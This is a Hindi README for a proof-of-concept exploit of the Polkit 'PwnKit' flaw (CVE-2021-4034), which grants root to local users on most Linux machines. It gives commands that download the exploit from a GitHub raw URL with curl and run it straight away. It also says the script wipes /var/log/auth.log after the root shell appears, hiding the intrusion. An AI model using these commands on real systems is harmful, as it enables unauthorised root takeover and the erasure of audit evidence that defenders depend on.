
CVE-2021-4034 के लिए Kim Schulz द्वारा एक python3 और bash PoC
██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
Kim Schulz द्वारा CVE-2021-4034 के लिए एक Python3 और BASH PoC
यह नए पाए गए Polkit त्रुटि PwnKit के लिए एक सरल PoC है।
मैंने इसे bash और python3 स्क्रिप्ट दोनों के रूप में बनाया है - सिर्फ मनोरंजन के लिए।
यह समस्या दुरुपयोग करने में बहुत सरल है लेकिन इसके बहुत बड़े परिणाम हैं क्योंकि यह अधिकांश Linux मशीनों पर आसानी से root पहुंच देगी जहाँ हमलावर के पास स्थानीय उपयोगकर्ता पहुंच है।
ये स्क्रिप्ट एक-शॉट निष्पादन हैं इसलिए बस करें
python3 pkwner.py
या
bash pkwner.sh
आप इसे सीधे वेबसर्वर (जैसे यह github रिपॉजिटरी) से भी चला सकते हैं:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
या
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
दोनों मामलों में यह कुछ इस तरह दिखना चाहिए:
और

स्क्रिप्ट कुछ फाइलें और फ़ोल्डर बनाएगी लेकिन root शेल पॉप होने के बाद खुद को साफ कर लेगी - यह /var/log/auth.log को भी साफ कर देगी (क्योंकि क्यों नहीं)।